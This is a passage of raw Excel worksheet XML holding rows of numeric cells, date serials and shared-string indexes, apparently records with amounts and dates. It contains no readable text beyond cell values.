        <v>10274</v>
      </c>
      <c r="G2438" s="1">
        <v>44154</v>
      </c>
      <c r="H2438">
        <v>0</v>
      </c>
      <c r="J2438" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="2439" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2439">
        <v>22155</v>
      </c>
      <c r="B2439">
        <v>480</v>
      </c>
      <c r="C2439" t="s">
        <v>1866</v>
      </c>
      <c r="D2439" t="s">
        <v>11842</v>
      </c>
      <c r="E2439">
        <v>16</v>
      </c>
      <c r="F2439" t="s">
        <v>7564</v>
      </c>
      <c r="G2439" s="1">
        <v>44154</v>
      </c>
      <c r="H2439">
        <v>0</v>
      </c>
      <c r="J2439" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="2440" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2440">
        <v>22156</v>
      </c>
      <c r="B2440">
        <v>480</v>
      </c>
      <c r="C2440" t="s">
        <v>1866</v>
      </c>
      <c r="D2440" t="s">
        <v>11842</v>
      </c>
      <c r="E2440">
        <v>16</v>
      </c>
      <c r="F2440" t="s">
        <v>547</v>
      </c>
      <c r="G2440" s="1">
        <v>44154</v>
      </c>
      <c r="H2440">
        <v>0</v>
      </c>
      <c r="J2440" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="2441" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2441">
        <v>22157</v>
      </c>
      <c r="B2441">
        <v>480</v>
      </c>
      <c r="C2441" t="s">
        <v>1866</v>
      </c>
      <c r="D2441" t="s">
        <v>11842</v>
      </c>
      <c r="E2441">
        <v>16</v>
      </c>
      <c r="F2441" t="s">
        <v>11848</v>
      </c>
      <c r="G2441" s="1">
        <v>44154</v>
      </c>
      <c r="H2441">
        <v>0</v>
      </c>
      <c r="J2441" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="2442" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2442">
        <v>22158</v>
      </c>
      <c r="B2442">
        <v>4898</v>
      </c>
      <c r="C2442" t="s">
        <v>7554</v>
      </c>
      <c r="D2442" t="s">
        <v>11849</v>
      </c>
      <c r="E2442">
        <v>1</v>
      </c>
      <c r="F2442" t="s">
        <v>609</v>
      </c>
      <c r="G2442" s="1">
        <v>44103</v>
      </c>
      <c r="H2442">
        <v>200000</v>
      </c>
      <c r="I2442" t="s">
        <v>10141</v>
      </c>
      <c r="J2442" t="s">
        <v>11850</v>
      </c>
    </row>
    <row r="2443" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2443">
        <v>22159</v>
      </c>
      <c r="B2443">
        <v>4898</v>
      </c>
      <c r="C2443" t="s">
        <v>7554</v>
      </c>
      <c r="D2443" t="s">
        <v>11849</v>
      </c>
      <c r="E2443">
        <v>1</v>
      </c>
      <c r="F2443" t="s">
        <v>11851</v>
      </c>
      <c r="G2443" s="1">
        <v>44103</v>
      </c>
      <c r="H2443">
        <v>400000</v>
      </c>
      <c r="I2443" t="s">
        <v>11852</v>
      </c>
      <c r="J2443" t="s">
        <v>11850</v>
      </c>
    </row>
    <row r="2444" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2444">
        <v>22160</v>
      </c>
      <c r="B2444">
        <v>4898</v>
      </c>
      <c r="C2444" t="s">
        <v>7554</v>
      </c>
      <c r="D2444" t="s">
        <v>11849</v>
      </c>
      <c r="E2444">
        <v>1</v>
      </c>
      <c r="F2444" t="s">
        <v>3763</v>
      </c>
      <c r="G2444" s="1">
        <v>44103</v>
      </c>
      <c r="H2444">
        <v>100000</v>
      </c>
      <c r="I2444" t="s">
        <v>11852</v>
      </c>
      <c r="J2444" t="s">
        <v>11850</v>
      </c>
    </row>
    <row r="2445" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2445">
        <v>22161</v>
      </c>
      <c r="B2445">
        <v>4898</v>
      </c>
      <c r="C2445" t="s">
        <v>7554</v>
      </c>
      <c r="D2445" t="s">
        <v>11849</v>
      </c>
      <c r="E2445">
        <v>1</v>
      </c>
      <c r="F2445" t="s">
        <v>2236</v>
      </c>
      <c r="G2445" s="1">
        <v>44103</v>
      </c>
      <c r="H2445">
        <v>200000</v>
      </c>
      <c r="I2445" t="s">
        <v>10149</v>
      </c>
      <c r="J2445" t="s">
        <v>11850</v>
      </c>
    </row>
    <row r="2446" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2446">
        <v>22162</v>
      </c>
      <c r="B2446">
        <v>4945</v>
      </c>
      <c r="C2446" t="s">
        <v>7579</v>
      </c>
      <c r="D2446" t="s">
        <v>9607</v>
      </c>
      <c r="E2446">
        <v>29</v>
      </c>
      <c r="F2446" t="s">
        <v>4686</v>
      </c>
      <c r="G2446" s="1">
        <v>44116</v>
      </c>
      <c r="H2446">
        <v>12000</v>
      </c>
      <c r="J2446" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2447" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2447">
        <v>22163</v>
      </c>
      <c r="B2447">
        <v>4945</v>
      </c>
      <c r="C2447" t="s">
        <v>7579</v>
      </c>
      <c r="D2447" t="s">
        <v>9607</v>
      </c>
      <c r="E2447">
        <v>29</v>
      </c>
      <c r="F2447" t="s">
        <v>2236</v>
      </c>
      <c r="G2447" s="1">
        <v>44116</v>
      </c>
      <c r="H2447">
        <v>50000</v>
      </c>
      <c r="I2447" t="s">
        <v>9550</v>
      </c>
      <c r="J2447" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2448" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2448">
        <v>22164</v>
      </c>
      <c r="B2448">
        <v>4945</v>
      </c>
      <c r="C2448" t="s">
        <v>7579</v>
      </c>
      <c r="D2448" t="s">
        <v>9607</v>
      </c>
      <c r="E2448">
        <v>29</v>
      </c>
      <c r="F2448" t="s">
        <v>9585</v>
      </c>
      <c r="G2448" s="1">
        <v>44116</v>
      </c>
      <c r="H2448">
        <v>1000</v>
      </c>
      <c r="I2448" t="s">
        <v>9550</v>
      </c>
      <c r="J2448" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2449" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2449">
        <v>22165</v>
      </c>
      <c r="B2449">
        <v>4945</v>
      </c>
      <c r="C2449" t="s">
        <v>7579</v>
      </c>
      <c r="D2449" t="s">
        <v>9607</v>
      </c>
      <c r="E2449">
        <v>29</v>
      </c>
      <c r="F2449" t="s">
        <v>11853</v>
      </c>
      <c r="G2449" s="1">
        <v>44116</v>
      </c>
      <c r="H2449">
        <v>1000</v>
      </c>
      <c r="I2449" t="s">
        <v>9550</v>
      </c>
      <c r="J2449" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2450" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2450">
        <v>22166</v>
      </c>
      <c r="B2450">
        <v>4945</v>
      </c>
      <c r="C2450" t="s">
        <v>7579</v>
      </c>
      <c r="D2450" t="s">
        <v>9607</v>
      </c>
      <c r="E2450">
        <v>29</v>
      </c>
      <c r="F2450" t="s">
        <v>11854</v>
      </c>
      <c r="G2450" s="1">
        <v>44116</v>
      </c>
      <c r="H2450">
        <v>2000</v>
      </c>
      <c r="I2450" t="s">
        <v>10442</v>
      </c>
      <c r="J2450" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2451" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2451">
        <v>22167</v>
      </c>
      <c r="B2451">
        <v>4945</v>
      </c>
      <c r="C2451" t="s">
        <v>7579</v>
      </c>
      <c r="D2451" t="s">
        <v>9607</v>
      </c>
      <c r="E2451">
        <v>29</v>
      </c>
      <c r="F2451" t="s">
        <v>11855</v>
      </c>
      <c r="G2451" s="1">
        <v>44116</v>
      </c>
      <c r="H2451">
        <v>1000</v>
      </c>
      <c r="I2451" t="s">
        <v>9550</v>
      </c>
      <c r="J2451" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2452" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2452">
        <v>22168</v>
      </c>
      <c r="B2452">
        <v>563</v>
      </c>
      <c r="C2452" t="s">
        <v>16430</v>
      </c>
      <c r="D2452" t="s">
        <v>16431</v>
      </c>
      <c r="E2452">
        <v>24</v>
      </c>
      <c r="F2452" t="s">
        <v>11857</v>
      </c>
      <c r="G2452" s="1">
        <v>44113</v>
      </c>
      <c r="H2452" s="4">
        <v>105000</v>
      </c>
      <c r="J2452" t="s">
        <v>11858</v>
      </c>
    </row>
    <row r="2453" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2453">
        <v>22171</v>
      </c>
      <c r="B2453">
        <v>501</v>
      </c>
      <c r="C2453" t="s">
        <v>526</v>
      </c>
      <c r="D2453" t="s">
        <v>11859</v>
      </c>
      <c r="E2453">
        <v>15</v>
      </c>
      <c r="F2453" t="s">
        <v>11860</v>
      </c>
      <c r="G2453" s="1">
        <v>44140</v>
      </c>
      <c r="H2453">
        <v>3840</v>
      </c>
      <c r="I2453" t="s">
        <v>11861</v>
      </c>
    </row>
    <row r="2454" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2454">
        <v>22172</v>
      </c>
      <c r="B2454">
        <v>501</v>
      </c>
      <c r="C2454" t="s">
        <v>526</v>
      </c>
      <c r="D2454" t="s">
        <v>11859</v>
      </c>
      <c r="E2454">
        <v>15</v>
      </c>
      <c r="F2454" t="s">
        <v>11862</v>
      </c>
      <c r="G2454" s="1">
        <v>44140</v>
      </c>
      <c r="H2454">
        <v>3840</v>
      </c>
      <c r="I2454" t="s">
        <v>11861</v>
      </c>
    </row>
    <row r="2455" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2455">
        <v>22173</v>
      </c>
      <c r="B2455">
        <v>2379</v>
      </c>
      <c r="C2455" t="s">
        <v>6238</v>
      </c>
      <c r="D2455" t="s">
        <v>11863</v>
      </c>
      <c r="E2455">
        <v>11</v>
      </c>
      <c r="F2455" t="s">
        <v>3318</v>
      </c>
      <c r="G2455" s="1">
        <v>44172</v>
      </c>
      <c r="H2455">
        <v>71100</v>
      </c>
    </row>
    <row r="2456" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2456">
        <v>22175</v>
      </c>
      <c r="B2456">
        <v>1951</v>
      </c>
      <c r="C2456" t="s">
        <v>6166</v>
      </c>
      <c r="D2456" t="s">
        <v>11694</v>
      </c>
      <c r="E2456">
        <v>31</v>
      </c>
      <c r="F2456" t="s">
        <v>4686</v>
      </c>
      <c r="G2456" s="1">
        <v>44098</v>
      </c>
      <c r="H2456">
        <v>5000</v>
      </c>
      <c r="J2456" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2457" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2457">
        <v>22176</v>
      </c>
      <c r="B2457">
        <v>773</v>
      </c>
      <c r="C2457" t="s">
        <v>1874</v>
      </c>
      <c r="D2457" t="s">
        <v>11864</v>
      </c>
      <c r="E2457">
        <v>17</v>
      </c>
      <c r="F2457" t="s">
        <v>9980</v>
      </c>
      <c r="G2457" s="1">
        <v>44120</v>
      </c>
      <c r="H2457">
        <v>400000</v>
      </c>
      <c r="I2457" t="s">
        <v>11865</v>
      </c>
      <c r="J2457" t="s">
        <v>11866</v>
      </c>
    </row>
    <row r="2458" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2458">
        <v>22177</v>
      </c>
      <c r="B2458">
        <v>773</v>
      </c>
      <c r="C2458" t="s">
        <v>1874</v>
      </c>
      <c r="D2458" t="s">
        <v>11864</v>
      </c>
      <c r="E2458">
        <v>17</v>
      </c>
      <c r="F2458" t="s">
        <v>11867</v>
      </c>
      <c r="G2458" s="1">
        <v>44120</v>
      </c>
      <c r="H2458">
        <v>50000</v>
      </c>
      <c r="I2458" t="s">
        <v>11868</v>
      </c>
      <c r="J2458" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2459" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2459">
        <v>22178</v>
      </c>
      <c r="B2459">
        <v>773</v>
      </c>
      <c r="C2459" t="s">
        <v>1874</v>
      </c>
      <c r="D2459" t="s">
        <v>11864</v>
      </c>
      <c r="E2459">
        <v>17</v>
      </c>
      <c r="F2459" t="s">
        <v>2236</v>
      </c>
      <c r="G2459" s="1">
        <v>44120</v>
      </c>
      <c r="H2459">
        <v>5000</v>
      </c>
      <c r="I2459" t="s">
        <v>11869</v>
      </c>
      <c r="J2459" t="s">
        <v>11866</v>
      </c>
    </row>
    <row r="2460" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2460">
        <v>22179</v>
      </c>
      <c r="B2460">
        <v>773</v>
      </c>
      <c r="C2460" t="s">
        <v>1874</v>
      </c>
      <c r="D2460" t="s">
        <v>11864</v>
      </c>
      <c r="E2460">
        <v>17</v>
      </c>
      <c r="F2460" t="s">
        <v>4686</v>
      </c>
      <c r="G2460" s="1">
        <v>44120</v>
      </c>
      <c r="H2460">
        <v>5000</v>
      </c>
      <c r="I2460" t="s">
        <v>11870</v>
      </c>
      <c r="J2460" t="s">
        <v>11871</v>
      </c>
    </row>
    <row r="2461" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2461">
        <v>22180</v>
      </c>
      <c r="B2461">
        <v>2317</v>
      </c>
      <c r="C2461" t="s">
        <v>5571</v>
      </c>
      <c r="D2461" t="s">
        <v>11872</v>
      </c>
      <c r="E2461">
        <v>26</v>
      </c>
      <c r="F2461" t="s">
        <v>1746</v>
      </c>
      <c r="G2461" s="1">
        <v>44299</v>
      </c>
      <c r="H2461">
        <v>145000</v>
      </c>
      <c r="J2461" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="2462" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2462">
        <v>22181</v>
      </c>
      <c r="B2462">
        <v>2317</v>
      </c>
      <c r="C2462" t="s">
        <v>16432</v>
      </c>
      <c r="D2462" t="s">
        <v>16433</v>
      </c>
      <c r="E2462">
        <v>26</v>
      </c>
      <c r="F2462" t="s">
        <v>9437</v>
      </c>
      <c r="G2462" s="1">
        <v>44299</v>
      </c>
      <c r="H2462">
        <v>137200.20000000001</v>
      </c>
      <c r="J2462" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="2463" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2463">
        <v>22182</v>
      </c>
      <c r="B2463">
        <v>2317</v>
      </c>
      <c r="C2463" t="s">
        <v>5571</v>
      </c>
      <c r="D2463" t="s">
        <v>11872</v>
      </c>
      <c r="E2463">
        <v>26</v>
      </c>
      <c r="F2463" t="s">
        <v>3499</v>
      </c>
      <c r="G2463" s="1">
        <v>44299</v>
      </c>
      <c r="H2463">
        <v>150</v>
      </c>
      <c r="J2463" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="2464" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2464">
        <v>22183</v>
      </c>
      <c r="B2464">
        <v>2317</v>
      </c>
      <c r="C2464" t="s">
        <v>5571</v>
      </c>
      <c r="D2464" t="s">
        <v>11872</v>
      </c>
      <c r="E2464">
        <v>26</v>
      </c>
      <c r="F2464" t="s">
        <v>11873</v>
      </c>
      <c r="G2464" s="1">
        <v>44300</v>
      </c>
      <c r="H2464">
        <v>5000</v>
      </c>
      <c r="J2464" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="2465" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2465">
        <v>22184</v>
      </c>
      <c r="B2465">
        <v>2317</v>
      </c>
      <c r="C2465" t="s">
        <v>5571</v>
      </c>
      <c r="D2465" t="s">
        <v>11872</v>
      </c>
      <c r="E2465">
        <v>26</v>
      </c>
      <c r="F2465" t="s">
        <v>11150</v>
      </c>
      <c r="G2465" s="1">
        <v>44299</v>
      </c>
      <c r="H2465">
        <v>5000</v>
      </c>
      <c r="J2465" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="2466" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2466">
        <v>22185</v>
      </c>
      <c r="B2466">
        <v>242</v>
      </c>
      <c r="C2466" t="s">
        <v>1130</v>
      </c>
      <c r="D2466" t="s">
        <v>11697</v>
      </c>
      <c r="E2466">
        <v>16</v>
      </c>
      <c r="F2466" t="s">
        <v>9441</v>
      </c>
      <c r="G2466" s="1">
        <v>44124</v>
      </c>
      <c r="H2466">
        <v>500000</v>
      </c>
      <c r="J2466" t="s">
        <v>11874</v>
      </c>
    </row>
    <row r="2467" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2467">
        <v>22187</v>
      </c>
      <c r="B2467">
        <v>242</v>
      </c>
      <c r="C2467" t="s">
        <v>1130</v>
      </c>
      <c r="D2467" t="s">
        <v>11697</v>
      </c>
      <c r="E2467">
        <v>16</v>
      </c>
      <c r="F2467" t="s">
        <v>11875</v>
      </c>
      <c r="G2467" s="1">
        <v>44124</v>
      </c>
      <c r="H2467">
        <v>100000</v>
      </c>
    </row>
    <row r="2468" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2468">
        <v>22188</v>
      </c>
      <c r="B2468">
        <v>242</v>
      </c>
      <c r="C2468" t="s">
        <v>1130</v>
      </c>
      <c r="D2468" t="s">
        <v>11697</v>
      </c>
      <c r="E2468">
        <v>16</v>
      </c>
      <c r="F2468" t="s">
        <v>11876</v>
      </c>
      <c r="G2468" s="1">
        <v>44124</v>
      </c>
      <c r="H2468">
        <v>100000</v>
      </c>
      <c r="J2468" t="s">
        <v>11877</v>
      </c>
    </row>
    <row r="2469" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2469">
        <v>22190</v>
      </c>
      <c r="B2469">
        <v>242</v>
      </c>
      <c r="C2469" t="s">
        <v>1130</v>
      </c>
      <c r="D2469" t="s">
        <v>11697</v>
      </c>
      <c r="E2469">
        <v>16</v>
      </c>
      <c r="F2469" t="s">
        <v>673</v>
      </c>
      <c r="G2469" s="1">
        <v>44124</v>
      </c>
      <c r="H2469">
        <v>500000</v>
      </c>
      <c r="J2469" t="s">
        <v>11874</v>
      </c>
    </row>
    <row r="2470" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2470">
        <v>22193</v>
      </c>
      <c r="B2470">
        <v>242</v>
      </c>
      <c r="C2470" t="s">
        <v>1130</v>
      </c>
      <c r="D2470" t="s">
        <v>11697</v>
      </c>
      <c r="E2470">
        <v>16</v>
      </c>
      <c r="F2470" t="s">
        <v>11878</v>
      </c>
      <c r="G2470" s="1">
        <v>44124</v>
      </c>
      <c r="H2470">
        <v>100000</v>
      </c>
    </row>
    <row r="2471" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2471">
        <v>22194</v>
      </c>
      <c r="B2471">
        <v>905</v>
      </c>
      <c r="C2471" t="s">
        <v>3483</v>
      </c>
      <c r="D2471" t="s">
        <v>11879</v>
      </c>
      <c r="E2471">
        <v>16</v>
      </c>
      <c r="F2471" t="s">
        <v>8295</v>
      </c>
      <c r="G2471" s="1">
        <v>44176</v>
      </c>
      <c r="H2471">
        <v>47000</v>
      </c>
      <c r="I2471" t="s">
        <v>10010</v>
      </c>
    </row>
    <row r="2472" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2472">
        <v>22199</v>
      </c>
      <c r="B2472">
        <v>905</v>
      </c>
      <c r="C2472" t="s">
        <v>3483</v>
      </c>
      <c r="D2472" t="s">
        <v>11879</v>
      </c>
      <c r="E2472">
        <v>16</v>
      </c>
      <c r="F2472" t="s">
        <v>11880</v>
      </c>
      <c r="G2472" s="1">
        <v>44176</v>
      </c>
      <c r="H2472">
        <v>0</v>
      </c>
      <c r="I2472" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="2473" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2473">
        <v>22200</v>
      </c>
      <c r="B2473">
        <v>708</v>
      </c>
      <c r="C2473" t="s">
        <v>1578</v>
      </c>
      <c r="D2473" t="s">
        <v>11881</v>
      </c>
      <c r="E2473">
        <v>2</v>
      </c>
      <c r="F2473" t="s">
        <v>9458</v>
      </c>
      <c r="G2473" s="1">
        <v>44144</v>
      </c>
      <c r="H2473">
        <v>15000</v>
      </c>
      <c r="I2473" t="s">
        <v>9536</v>
      </c>
      <c r="J2473" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="2474" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2474">
        <v>22201</v>
      </c>
      <c r="B2474">
        <v>708</v>
      </c>
      <c r="C2474" t="s">
        <v>1578</v>
      </c>
      <c r="D2474" t="s">
        <v>11881</v>
      </c>
      <c r="E2474">
        <v>2</v>
      </c>
      <c r="F2474" t="s">
        <v>9838</v>
      </c>
      <c r="G2474" s="1">
        <v>44144</v>
      </c>
      <c r="H2474">
        <v>15000</v>
      </c>
      <c r="I2474" t="s">
        <v>11882</v>
      </c>
      <c r="J2474" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="2475" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2475">
        <v>22202</v>
      </c>
      <c r="B2475">
        <v>708</v>
      </c>
      <c r="C2475" t="s">
        <v>1578</v>
      </c>
      <c r="D2475" t="s">
        <v>11881</v>
      </c>
      <c r="E2475">
        <v>2</v>
      </c>
      <c r="F2475" t="s">
        <v>7564</v>
      </c>
      <c r="G2475" s="1">
        <v>44144</v>
      </c>
      <c r="H2475">
        <v>10000</v>
      </c>
      <c r="J2475" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="2476" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2476">
        <v>22203</v>
      </c>
      <c r="B2476">
        <v>708</v>
      </c>
      <c r="C2476" t="s">
        <v>1578</v>
      </c>
      <c r="D2476" t="s">
        <v>11881</v>
      </c>
      <c r="E2476">
        <v>2</v>
      </c>
      <c r="F2476" t="s">
        <v>547</v>
      </c>
      <c r="G2476" s="1">
        <v>44144</v>
      </c>
      <c r="H2476">
        <v>5000</v>
      </c>
      <c r="I2476" t="s">
        <v>9536</v>
      </c>
      <c r="J2476" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="2477" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2477">
        <v>22205</v>
      </c>
      <c r="B2477">
        <v>558</v>
      </c>
      <c r="C2477" t="s">
        <v>1883</v>
      </c>
      <c r="D2477" t="s">
        <v>11883</v>
      </c>
      <c r="E2477">
        <v>16</v>
      </c>
      <c r="F2477" t="s">
        <v>673</v>
      </c>
      <c r="G2477" s="1">
        <v>44158</v>
      </c>
      <c r="H2477">
        <v>500000</v>
      </c>
      <c r="J2477" t="s">
        <v>11884</v>
      </c>
    </row>
    <row r="2478" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2478">
        <v>22206</v>
      </c>
      <c r="B2478">
        <v>558</v>
      </c>
      <c r="C2478" t="s">
        <v>1883</v>
      </c>
      <c r="D2478" t="s">
        <v>11883</v>
      </c>
      <c r="E2478">
        <v>16</v>
      </c>
      <c r="F2478" t="s">
        <v>9441</v>
      </c>
      <c r="G2478" s="1">
        <v>44158</v>
      </c>
      <c r="H2478">
        <v>100000</v>
      </c>
      <c r="J2478" t="s">
        <v>11884</v>
      </c>
    </row>
    <row r="2479" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2479">
        <v>22207</v>
      </c>
      <c r="B2479">
        <v>4925</v>
      </c>
      <c r="C2479" t="s">
        <v>7594</v>
      </c>
      <c r="D2479" t="s">
        <v>11885</v>
      </c>
      <c r="E2479">
        <v>33</v>
      </c>
      <c r="F2479" t="s">
        <v>2236</v>
      </c>
      <c r="G2479" s="1">
        <v>44103</v>
      </c>
      <c r="H2479">
        <v>50000</v>
      </c>
      <c r="I2479" t="s">
        <v>9693</v>
      </c>
      <c r="J2479" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="2480" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2480">
        <v>22208</v>
      </c>
      <c r="B2480">
        <v>4925</v>
      </c>
      <c r="C2480" t="s">
        <v>7594</v>
      </c>
      <c r="D2480" t="s">
        <v>11885</v>
      </c>
      <c r="E2480">
        <v>33</v>
      </c>
      <c r="F2480" t="s">
        <v>11886</v>
      </c>
      <c r="G2480" s="1">
        <v>44099</v>
      </c>
      <c r="H2480">
        <v>50000</v>
      </c>
      <c r="I2480" t="s">
        <v>9550</v>
      </c>
      <c r="J2480" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="2481" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2481">
        <v>22209</v>
      </c>
      <c r="B2481">
        <v>4925</v>
      </c>
      <c r="C2481" t="s">
        <v>7594</v>
      </c>
      <c r="D2481" t="s">
        <v>11885</v>
      </c>
      <c r="E2481">
        <v>33</v>
      </c>
      <c r="F2481" t="s">
        <v>10502</v>
      </c>
      <c r="G2481" s="1">
        <v>44099</v>
      </c>
      <c r="H2481">
        <v>50000</v>
      </c>
      <c r="I2481" t="s">
        <v>9693</v>
      </c>
      <c r="J2481" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="2482" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2482">
        <v>22210</v>
      </c>
      <c r="B2482">
        <v>4925</v>
      </c>
      <c r="C2482" t="s">
        <v>7594</v>
      </c>
      <c r="D2482" t="s">
        <v>11885</v>
      </c>
      <c r="E2482">
        <v>33</v>
      </c>
      <c r="F2482" t="s">
        <v>9437</v>
      </c>
      <c r="G2482" s="1">
        <v>44099</v>
      </c>
      <c r="H2482">
        <v>20000</v>
      </c>
      <c r="I2482" t="s">
        <v>9693</v>
      </c>
      <c r="J2482" t="s">
        <v>11887</v>
      </c>
    </row>
    <row r="2483" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2483">
        <v>22211</v>
      </c>
      <c r="B2483">
        <v>4925</v>
      </c>
      <c r="C2483" t="s">
        <v>7594</v>
      </c>
      <c r="D2483" t="s">
        <v>11885</v>
      </c>
      <c r="E2483">
        <v>33</v>
      </c>
      <c r="F2483" t="s">
        <v>1746</v>
      </c>
      <c r="G2483" s="1">
        <v>44103</v>
      </c>
      <c r="H2483">
        <v>50000</v>
      </c>
      <c r="I2483" t="s">
        <v>9693</v>
      </c>
      <c r="J2483" t="s">
        <v>11887</v>
      </c>
    </row>
    <row r="2484" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2484">
        <v>22221</v>
      </c>
      <c r="B2484">
        <v>4957</v>
      </c>
      <c r="C2484" t="s">
        <v>7602</v>
      </c>
      <c r="D2484" t="s">
        <v>11888</v>
      </c>
      <c r="E2484">
        <v>29</v>
      </c>
      <c r="F2484" t="s">
        <v>11558</v>
      </c>
      <c r="G2484" s="1">
        <v>44113</v>
      </c>
      <c r="H2484">
        <v>1000000</v>
      </c>
      <c r="I2484" t="s">
        <v>11889</v>
      </c>
    </row>
    <row r="2485" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2485">
        <v>22222</v>
      </c>
      <c r="B2485">
        <v>906</v>
      </c>
      <c r="C2485" t="s">
        <v>3505</v>
      </c>
      <c r="D2485" t="s">
        <v>11890</v>
      </c>
      <c r="E2485">
        <v>5</v>
      </c>
      <c r="F2485" t="s">
        <v>10629</v>
      </c>
      <c r="G2485" s="1">
        <v>44147</v>
      </c>
      <c r="H2485">
        <v>300000</v>
      </c>
      <c r="I2485" t="s">
        <v>9638</v>
      </c>
    </row>
    <row r="2486" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2486">
        <v>22223</v>
      </c>
      <c r="B2486">
        <v>906</v>
      </c>
      <c r="C2486" t="s">
        <v>3505</v>
      </c>
      <c r="D2486" t="s">
        <v>11890</v>
      </c>
      <c r="E2486">
        <v>5</v>
      </c>
      <c r="F2486" t="s">
        <v>9798</v>
      </c>
      <c r="G2486" s="1">
        <v>44147</v>
      </c>
      <c r="H2486">
        <v>100000</v>
      </c>
      <c r="I2486" t="s">
        <v>9660</v>
      </c>
    </row>
    <row r="2487" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2487">
        <v>22224</v>
      </c>
      <c r="B2487">
        <v>906</v>
      </c>
      <c r="C2487" t="s">
        <v>3505</v>
      </c>
      <c r="D2487" t="s">
        <v>11890</v>
      </c>
      <c r="E2487">
        <v>5</v>
      </c>
      <c r="F2487" t="s">
        <v>9561</v>
      </c>
      <c r="G2487" s="1">
        <v>44147</v>
      </c>
      <c r="H2487">
        <v>1000</v>
      </c>
      <c r="I2487" t="s">
        <v>9638</v>
      </c>
    </row>
    <row r="2488" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2488">
        <v>22225</v>
      </c>
      <c r="B2488">
        <v>4913</v>
      </c>
      <c r="C2488" t="s">
        <v>7607</v>
      </c>
      <c r="D2488" t="s">
        <v>11891</v>
      </c>
      <c r="E2488">
        <v>33</v>
      </c>
      <c r="F2488" t="s">
        <v>11892</v>
      </c>
      <c r="G2488" s="1">
        <v>44109</v>
      </c>
      <c r="H2488">
        <v>100000</v>
      </c>
      <c r="I2488" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="2489" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2489">
        <v>22226</v>
      </c>
      <c r="B2489">
        <v>4913</v>
      </c>
      <c r="C2489" t="s">
        <v>7607</v>
      </c>
      <c r="D2489" t="s">
        <v>11891</v>
      </c>
      <c r="E2489">
        <v>33</v>
      </c>
      <c r="F2489" t="s">
        <v>10502</v>
      </c>
      <c r="G2489" s="1">
        <v>44109</v>
      </c>
      <c r="H2489">
        <v>100000</v>
      </c>
      <c r="I2489" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="2490" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2490">
        <v>22227</v>
      </c>
      <c r="B2490">
        <v>2735</v>
      </c>
      <c r="C2490" t="s">
        <v>6882</v>
      </c>
      <c r="D2490" t="s">
